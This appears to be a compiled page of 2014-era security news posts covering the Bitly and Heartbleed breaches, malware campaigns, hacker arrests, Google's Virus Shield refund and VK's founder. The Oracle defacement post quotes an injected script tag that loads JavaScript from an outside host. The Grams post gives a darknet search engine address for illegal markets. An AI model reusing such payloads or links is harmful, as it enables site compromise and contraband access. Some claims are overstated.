URL Shortening service Bitly hacked, Change your password and Revoke Access from your social accounts post by Anand Garg

One of the Biggest URL shortening service Bitly has been hacked through a security breach and Hackershave stolen your passwords and the Most important thing OAuth Tokens– which we use to Login into Bitly through our social accounts like Facebook, Twitter.

Government starts testing a Program in which a user must have License (Internet ID) to access the Internet post by Anand Garg

National Institute of Standards and Technology (NIST) has issued $2.4 million for testing a government-based online identity system in Michigan and Pennsylvania. The initiative was developed under the “NationalStrategy for Trusted Identities in Cyberspace” program for years and now is rolled-out for field testing.

Snowden says that everyone is now under government surveillance post by Anand Garg

Snowden says that everyone is now under government surveillance

Edward Snowden, former CIA contractor, declared during a debate regarding the NSA intelligence gatheringprograms that government surveillance has reached a new level. During the debate that took place in Toronto, Snowden declared that all the population is being motorized, meaning that the intelligencegathering programs make no discrimination when it comes to citizens taken as individuals:
“It’s no longer based on the traditional practice of targeted taps based on some individual suspicion of wrongdoing” Snowden said. “It covers phone calls, emails, texts, search history, what you buy, who your friends are, where you go, who you love.”

Jailbroken iPhones are being targeted by an active malware campaign, stealing passwords Post by Anand Garg

A malware campaign has been unearthed by security researcher Stefan Esser after many of the users of jailbroken iPhones and iPads posted on Reddit that their devices crashed repeatedly after installing unofficial tweaks through a third-party app store called ‘Cydia’ which serves the market of jailbroken  Apple devices.

Two Anonymous Hackers arrested in Joint Operation With FBI Post by Anand Garg

Cambodian National Police has arrested two members of Anonymous Cambodia earlier this month, April 7, in a joint operation with the U.S. Federal Bureau of Investigation (FBI) which has been running for about eight months according to a statement available on the website of National Police. Both arrested personal are members of the global ‘Anonymous’ hacking group which called for attack on Israeli cyberspace earlier this month on the same date that is 7^th April.

They are identified as Bun Khing Mongkul Panha and Chou Songheng. Both are 21 years old and were third-year students at the SETEC Institute, a Phnom Penh-based university. Panha is identified online as ‘Sex Machine’ and ‘Black Cyber’ whereas Songheng is known in cyberspace as ‘Zoro’. The reason for their arrest is the hacking of 30 government websites as well as some private business websites. The hacking profile includes big names such as National Election Committee (NEC), Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality.

Mr. Panha has confessed about the hacking and Mr. Songheng said he just wanted to learn hacking and is Mr. Panha’s student.

“He just wanted to learn about it. That is why he decided to join the hacker group,” the statement said of Mr. Songheng.

They are arrested under Cambodian Criminal Code,articles 427, 428 and 429, which concerns with information technology and penalizes the culprit with 500 USD to 1000 USD fine with one to two years behind bars.

“The suspects are still under investigation by the court, so they have detained them for trial,” said Dim Chaoseng, the lawyer for Mr. Panha and Mr. Songheng.

Rasch, the former head of the U.S. Department of Justice Computer Crime Unit, said:

“These are not considered major crimes.”

“Since [Cambodia] doesn’t have a cybercrime law, they can’t charge them with more serious crimes.”

Lieutenant General Chhay Sinarith, director of the Ministry of Interior’s internal security department, said the arrest is part of an ongoing effort in cooperation of FBI. He said:

“The National Police were cooperating with the FBI to conduct an investigation on [hacking] when we found out these two suspects hacked the NEC…and other government institutions.”

Refrence by- hackersnewsbulletin.com

Meet the First Password Free email service, now you don’t have to remember your passwords Post by Anand Garg

Meet the First Password Free email service, now you don’t have to remember your passwords

ORACLE Subdomain Page Defaced by Indian Hacker

A group of Indian Hackers dubbed as I-HOS TEAM has successfully defaced a page on the sub domain of Oracle Corporation, biggest provider of enterprise software, computer hardware and Services.

The users visiting the domain are being greeted with a custom webpage with black background and the theme song of an Indian Movie “BOSS”. The defacement page is displaying a logo with title “IHOS - Indian Hackers Online Squad” with a quotation for all the Indian hackers shows, “LOVE TO ALL INDIAN HACKERS OUT THERE.”

Neither the website nor the server was actually compromised, but the Hacker going by online alias ‘Bl@Ck Dr@GoN’, actually found a page on the Oracle website that allows him to inject HTML/JavaScript code into the Oracle University Electronic Attendance webpage in order to modify the content, as shown in the screenshot provided to The Hacker News:

Hacker told THN that anyone is able to edit the Student name on the website and can insert any code, which is not sanitized properly by the Oracle website. This is awful to see that World’s biggest programming and Software company failed to protect their website from very basic Cross Site Scriptingvulnerability.

Defaced Link: Click Here
Injected Javascript: <script src=http://oppwnjms.loomhost.com/bd1.js></script>

At the time of writing, the website was defaced and in case it got fixed, users may check the defaced website’s mirror at Zone-H.

In most of the cases, a hacker look to promote a specific cause when defacing a high profile site, but in this case there seems to have no specified reason to deface the web page. We mostly have seen the defacement of website by the hackers lifting boring messages like “Hello World” or similar, but this is the first time when Oracle Web page is sounding Yo Yo Honey Singh’s beat-full Song.

Windows Spy tool equipped with Android malware to hack Smartphones

I am quite sure that you must be syncing your Smartphone with your Computers for transferring files and taking backup of your device.

If you are using windows operating system and Android devices, then it’s a bad news for you, because FireEye Security Researchers have identified a new piece of windows malware that can also infects your Android Devices.

During an investigation of a targeted attack on a US based financial institution, researchers spotted a new version of Windows Remote Access Trojan (RAT) called 'Win-Spy Software Pro v16', a spying and monitoring tool. WinSpy was embedded in macro documents to kick off a spam campaign via a spear phishing email.

“The recent surge in Android-based RATs such as Dendroid and AndroRAT shows a spike in the interest of malicious actors to control mobile devices. GimmeRAT is another startling example of malicious actors venturing into the Android ecosystem,” security firm said.

The Researchers dubbed the Android spying component pre-loaded with WinSpy as GimmeRat, that allow hackers to control the victims’ device by using their own phone remotely over SMSs, or alternatively through a Windows-based controller.

"We also discovered various Android components that can be employed to engage in surveillance of a target."  security firm said in a blog post.

To install the Android malware, WinSpy communicates with mobile devices connected to the infected computer using a command line tool called Android Debug Bridge (ADB), that allows the Windows malware to execute commands on the Android device. ADB is a legitimate tool and part of the official Android software development kit (SDK). If USB debugging Mode is enabled on the device, it initiates the installation process.

The new Android components also smooth the ways for surveillance of the target and there are three different applications that are part of the Android surveillance package.

“We have found three different applications that are a part of the surveillance package. One of the applications requires commandeering via a window controller and requires physical access to the device while the other two applications can be deployed in a client-server model and allow remote access through a second Android device,” wrote the researchers.

The technique is now new, Similar payload was used by other windows malware called ‘Trojan.Droidpak’ to infect Android Device, that was discovered by Antivirus firm Symantec in January.

Using Android malware, the attackers could trace victims’ GPS location, can take screenshots of victims’ devices and could send these data to the remote Command-and-Control servers. Trojan is also perfect in monitoring the device' text messages.

"The hostname, port, username, and password are used to connect to the attackers’ FTP server to send screenshots, which is explained, in a later section. Once this intent is received the GlobalService is restarted with the interval parameter.." FireEye said.

When Windows system infected with WinSpy, an attacker can take screenshots, log keystrokes and even can also use it to open a backdoor for remote commands, upload and download of more files and the execution of remote commands.

With the widespread use of Smartphones, the adoption of the mobile platforms such as Android has been increased, and so the new market of cyber criminals demands for RATs to support these platforms. Such interesting tactics can be used to serve fake Mobile Banking apps.. Fairly evil Ideas!

Google Gives Refund to Thousands of Buyers Who Bought Bogus Android AntiVirus App Post by Anand Garg

About a week back we reported about a popular paid Antivirus application on the Google Play Store which was actually a scam, dubbed as ‘Virus Shield’.

This First paid fake app managed to become one of the most popular anti-virus app in less than a week, and apparently more than 10,000 Smartphones users purchased it in $3.99 from Google Play Store and hence scammed more than $40,000.

The Virus Shield Android App claimed to protect users’ personal information from harmful viruses, malware and spyware, but in actual app doesn't scan anything and was removed from the store once the fraud had been uncovered.

If you were one that had downloaded the Virus Shield Antivirus app, then don't worry, just check your email inbox, because Google cares about you and reaching out all those affected android users who purchased the app, in order to refund their money in full.

REFUND WITH $5 BONUS CREDIT
According to Android Police, Google has decided to refund $3.99 back to users and apart from the full refund, to maintain its reputation among users, Google offering an extra $5 Google Play Store credit to each, which can be used to purchase digital content on Google Play store such as apps, games, books, music and movies.

“Google Play’s policies strictly prohibit false claims like these, and in light of this, we’re refunding you for your “Virus Shield” purchase. You should see funds returned to your account within the next 14 days. Additionally, we'd like to offer you $5 promotional credit1, which can be used to purchase digital content on Google Play such as apps, games, books, music and movies.” Google Play Support said.

The developer of Virus Shield app approached The Guardian newspaper to claims that the app without the virus protection was uploaded to the Play Store by mistake and he removed the app from the Play Store himself before his developer account was suspended.

"One of our developers simply made a foolish mistake. The app version that was decompiled by AndroidPolice was not intended to be released. It was an early placeholder that our ui designer created. There was a mix-up between the version that contained the antivirus code for our app." app developer Jesse Carter of Deviant Solutions said.

GOOGLE APOLOGY LETTER

Hello,

We're reaching out to you because you recently purchased the “Virus Shield” app on Google Play. This app made the false claim that it provided one-click virus protection; in reality, it did not.

Google Play’s policies strictly prohibit false claims like these, and in light of this, we’re refunding you for your “Virus Shield” purchase. You should see funds returned to your account within the next 14 days.

Additionally we'd like to offer you $5 promotional credit1, which can be used to purchase digital content on Google Play such as apps, games, books, music and movies.

Your credit redemption code is XXXXXXXXXXXXXXX. Click or tap here to redeem. For help redeeming, please visit our Help Center.

We're sorry for any inconvenience this may have caused; rest assured that we're always working to make Google Play better for our users.

Thank you,

Google Play Support

Google learned from their mistake and promised that such apps will never get top position, even if allowed to be listed in the Play Store.

Refrence by- The hacker News

Russian Facebook 'VKontakte' Dramatically Fires Original Founder 'Pavel Durov' Post by Anand Garg

Yesterday reports revealed that Pavel Durov, the 29-year-old founder of Russia’s most popular social networking site VKontakte (VK) - Russia’s Facebook, had been fired from his post of general director of Vkontakte.

On monday, Durov said that the social networking site VK is now under the complete control of two close allies of President Vladimir Putin.

Publicly announcing his firing on his VK page he said, “In this way, today VKontakte goes under the complete control of Igor Sechin and Alisher Usmanov. Probably, in the Russian context, something like this was inevitable, but I'm happy we lasted seven and a half years. We did a lot. And part of what’s been done can't be turned back.”

Last Month on 21st March, the 29-year-old entrepreneur announced submitted his resignation, but earlier this month that he had rescinded his resignation as the company’s CEO because it was an April Fool Prank, but unfortunately he supposedly failed to properly withdraw before a one-month deadline had expired.

PUTIN ALLIES 'ALISHER USMANOV' & 'IGOR SECHIN' CONTROL VKontakte

Current owners Alisher Usmanov the is Russia's richest man and head of Mail.ru service and Igor Sechin is the CEO of a state-owned oil company and reportedly a close Putin ally.

Durov claims he heard news of his resignation from the press, not from the company's managing board. “It is interesting that the shareholders did not have enough courage to do it directly,” Durov wrote on his VK page, “about this mysterious dismissal I learnt from the press.”

The social media site boasts over 100 million users, and Durov as CEO has largely stayed out of politics. He also refused the previous Kremlin attempts to censor VKontakte, including not shutting down the page of a Putin rival, Alexey Navalny, or Ukrainian protesters.

He had resisted to release personal information about opposition activists who use VK even after increasing pressure from the Federal Security Services.

DUROV SOLD HIS 12% STAKE IN VK

In January this year, Pavel Durov suddenly sold out his remaining 12 percent stake in VK, estimated at a value of $420 million, to MegaFon chief Ivan Tavrin, which is co-owned by Alisher Usmanov. He said, "I’m not going anywhere and I’m going to continue to monitor the quality of VKontakte. In the end, VKontakte is the best that has been created in Russia in the sphere of communications. And my responsibility is to preserve and protect the network."

Durov founded VKontakte in the year 2006 with an interface quite similar to that of Facebook. Due to its user friendly interface and virtually unlimited access to videos and music freely uploaded by other users, the social network became hugely popular and became Russia’s most leading social network with almost 61 million active users in Russia alone and approximately 100 million users worldwide.

From now on, VKontakte’s control is in the hands of billionaire Alisher Usmanov's Mail Group, which holds 52 percent of the company shares and the remaining 48 percent is controlled by investment group United Capital Partners.

At this time the CEO position is very Dramatic and it is not yet clear who will be pointed as the new CEO, but till then the deputy chief executive Boris Dobrodeyev and executive director Dmitry Sergeyev will lead VK.

Last week, during a Live Interview on a National News channel, Edward Snowden asked a surprised question to the Russian President Vladimir Putin, “Does Russia store, intercept, or analyze, in any way, the communications of millions of individuals?”, and Mr. President denied it by replying that Russia is not carrying out any mass surveillance programmes, but the Media around the world criticized this Interview as a PR stunt to hide Russian Surveillance scene.

Refrence by- The Hacker News

Google Working On End-to-End Encryption for Gmail Service Post by Anand Garg

Constant password breaches and Snowden revelations about Government Surveillance have raised many questions that why don’t cloud and email Services encrypt the data stored on their server? 

Revelations forced the popular Internet Giants such as Google and Yahoo to contemplate on the privacy and security issues and in response companies started enhancing their encryption standard by enabling HTTPS by default and removed the option to turn it off.

A few days back, Google admitted that their automated systems read your content, including incoming and outgoing emails to provide you personally relevant advertisements. That means Internet giants generally do encrypt your data, but they have the key so they can decrypt it any time they want.

Encryption is mandatory in Modern Internet and web services should consider Encrypting and decrypting your data locally, so that no one can snoop on. Such cryptographic mechanism is called End-to-End Encryption, that means content of your messages would be known to you and your browser, but not to Google itself.

GMAIL END-to-END ENCRYPTION

Well, According to Unknown Sources from Google confirmed that company is finally planning to take another step to ensure its users Privacy by implementing more complex encryption tools such as the secure PGP (Pretty Good Privacy).

PGP is an open source end-to-end encryption standard for almost 20 years, used to encrypt e-mail over the Internet providing cryptographic privacy and authentication for data communication, which makes it very difficult to break. So, bringing PGP to the Gmail service will result in a much stronger end-to-end encryption for emails.

The Sources acknowledged that the end-to-end encryption is best from a security standpoint and also compatible with Gmail, but implementing it on the end-user requires significant efforts.

End-to-End Encryption to the email service basically implies that only the sender and receiver can read the contents of a message and nobody else, so it offers stronger protection than SSL/TLS.

ISSUES WITH ENCRYPTION IMPLEMENTATION 

Well, there could be some issues in such encryption implementation and right now we don't know that exactly what measures Google will take, but there are two major issues, which we and Google will deal at the same time:

1. How would the Crypto Keys be managed? PGP protected emails would require decryption keys that only the sender and recipient would have to read the content transmitted between the two, and ideally Google won't have access to the messages.
2. What about the features of Gmail that rely on Email Content? This means that the adoption of PGP encryption could be problematic for Google as it won’t allow them to scan your emails to serve its spam filtering feature, content-based advertisements and even the search option.

GOOGLE WILL CHARGE FOR SECURE EMAIL SERVICE?

Because Google will not be able to Monetize the End-to-End Encrypted emails, so it could be possible that rather than offering free email service, Google will start charging optionally to the users who want encrypted service. We hope that Google will soon shed more light on their end-to-end encryption initiatives. Stay Tuned.

Stronger end-to-end encryption will certainly be appreciated by Gmail users, but meanwhile you should know that major Desktop Email clients such as Microsoft Outlook and Mozilla Thunderbird with the Enigmail plugin can be configured manually to work smoothly with PGP encryption software, making it a simple matter of clicking a button to sign, verify, encrypt and decrypt email messages. Learn How to use PGP to Secure your Email Communication.

Refrence by- The Hacker News

Grams - First Search Engine for Underground Black Markets Post by Anand Garg

We often talk about Underground communities, illegal websites or black markets, but as they are ‘Underground’ in nature i.e. Hidden websites running under Onion Network, many of us don't know how to reach the one we are searching for and if hopefully found, then its difficult to figure out a trustworthy vendor.

Underground websites offer illegal high quality drugs or rifles, hacking tools, or any illegal services, until now you needed to type long, complex and specific Tor browser URLs directly into the browser which is quite difficult and sometimes the sites change their addresses which makes more difficult to navigate.

Not any More! As the first search engine, ‘Grams’ (http://grams7enufi7jmdl.onion) for online underground Black Markets has been launched in Beta last week, that lets anyone to easily find illegal drugs and other contraband online in an easier way ever and it's pretty fast like Google Search Engine.

You don't need to do anything, just like you type on the search engines like Google for the things you are looking for, same goes with this Deep Web search engine, Grams. It also looks alike Google and is quite the most comprehensive way to find all illegal things.

“I am working on the algorithm so it is a lot like google's it will have a scoring system based how long the listing has been up, how many transactions, how many good reviews. That way you will see the best listing first,” Grams’ creator who calls himself Gramsadmin wrote on Reddit. He also added, “I am going to add a filter market this week so a use can search only the markets they have accounts for.”

Currently Grams search engine crawls results from eight different black markets, including Agora, BlackBank, C9, Evolution, Mr. Nice Guy, Pandora, The Pirate Market, and SilkRoad2. From online conversations, it is estimated that the developer of Grams is trying to contact more underground website owners to offer them indexing their websites on his search engine.

Refrence by- The Hacker News

List of Most Popular Websites affected by Heartbleed (The Biggest security breach), CHANGE YOUR PASSWORD NOW Post by Anand Garg

As we already aware about the recent biggest security breach on the internet known as ‘Heartbleed Bug’ which clearly hacked all of your passwords and your personal, financial information like credit card numbers that you use on some popular sites like Facebook, Google, yahoo and more, so it’s time to ping you about the sites which are affected by this bug.

We have listed below most popular sites which are affected by the Flaw:

Search: 

WEBSITE	AFFECTED?	WHAT THEY SAID?
Amazon Web Services(for website operators)	YES	Most services were unaffected or Amazon was already able to apply mitigations (see advisory note here). Elastic Load Balancing, Amazon EC2, Amazon Linux AMI, Red Hat Enterprise Linux, Ubuntu, AWS OpsWorks, AWS Elastic Beanstalk and Amazon CloudFront were patched.
American Funds	YES	American Funds told customers to change their username and passwords, as the company "learned of a very narrow window of risk to those who logged into americanfunds.com between December 12, 2013 and April 14, 2014."
Box	YES	"We're currently working with our customers to proactively reset passwords and are also reissuing new SSL certificates for added protection."
Dropbox	YES	ON TWITTER: "We’ve patched all of our user-facing services & will continue to work to make sure your stuff is always safe."
Etsy	YES	Etsy said that only a small part of its infrastructure was vulnerable, and they have patched it.
Facebook	YES	"We added protections for Facebook’s implementation of OpenSSL before this issue was publicly disclosed. We haven’t detected any signs of suspicious account activity, but we encourage people to ... set up a unique password."
Flickr	YES	"As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now."
GitHub	YES	GitHub said it has patched all its systems, deployed new SSL certificates and revoked old ones. GitHub is asking all users to change password, enable two-factor authentication and "revoke and recreate personal access and application tokens."
Gmail	YES	“We have assessed the SSL vulnerability and applied patches to key Google services.” *Google said users do not need to change their passwords, but because of the previous vulnerability, better safe than sorry.
GoDaddy	YES	"We’ve been updating GoDaddy services that use the affected OpenSSL version."
Google	YES	“We have assessed the SSL vulnerability and applied patches to key Google services.” Search, Gmail, YouTube, Wallet, Play, Apps and App Engine were affected; Google Chrome and Chrome OS were not. *Google said users do not need to change their passwords, but because of the previous vulnerability, better safe than sorry.
IFTTT	YES	IFTTT emailed all its users and logged them out, prompting them to change their password on the site.
Instagram	YES	"Our security teams worked quickly on a fix and we have no evidence of any accounts being harmed. But because this event impacted many services across the web, we recommend you update your password on Instagram and other sites, particularly if you use the same password on multiple sites.”
Minecraft	YES	"We were forced to temporary suspend all of our services. ... The exploit has been fixed. We can not guarantee that your information wasn't compromised."
Netflix	YES	"Like many companies, we took immediate action to assess the vulnerability and address it. We are not aware of any customer impact. It’s a good practice to change passwords from time to time, now would be a good time to think about doing so. "
OKCupid	YES	"We, like most of the Internet, were stunned that such a serious bug has existed for so long and was so widespread."
Pinterest	YES	"We fixed the issue on Pinterest.com, and didn’t find any evidence of mischief. To be extra careful, we e-mailed Pinners who may have been impacted, and encouraged them to change their passwords."
SoundCloud	YES	SoundCloud emphasized that there were no indications of any foul play and that the company's actions were simply precautionary.
Tumblr	YES	"We have no evidence of any breach and, like most networks, our team took immediate action to fix the issue."
Venmo	YES	Venmo sent an email to its users, saying the company took "immediate steps to patch the potential vulnerability" and recommended that they change their passwords.
Wikipedia	YES	"We recommend changing your password as a standard precautionary measure, but we do not currently intend to enforce a password change for all users."
Wordpress	YES	Wordpress confirmed that it was vulnerable to Heartbleed and that it has patched its servers "within a few hours of the public disclosure." Wordpress is not forcing users to change their passwords, but said users "are welcome" to do it.
Wunderlist	YES	"You’ll have to simply log back into Wunderlist. We also strongly recommend that you reset your password for Wunderlist."
Yahoo	YES	"As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now." Yahoo Homepage, Yahoo Search, Yahoo Mail, Yahoo Finance, Yahoo Sports, Yahoo Food, Yahoo Tech, Flickr and Tumblr were patched. More patches to come, Yahoo says.
Yahoo Mail	YES	"As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now."
YouTube	YES	“We have assessed the SSL vulnerability and applied patches to key Google services.”

Refrence by- hackersnewsbulletin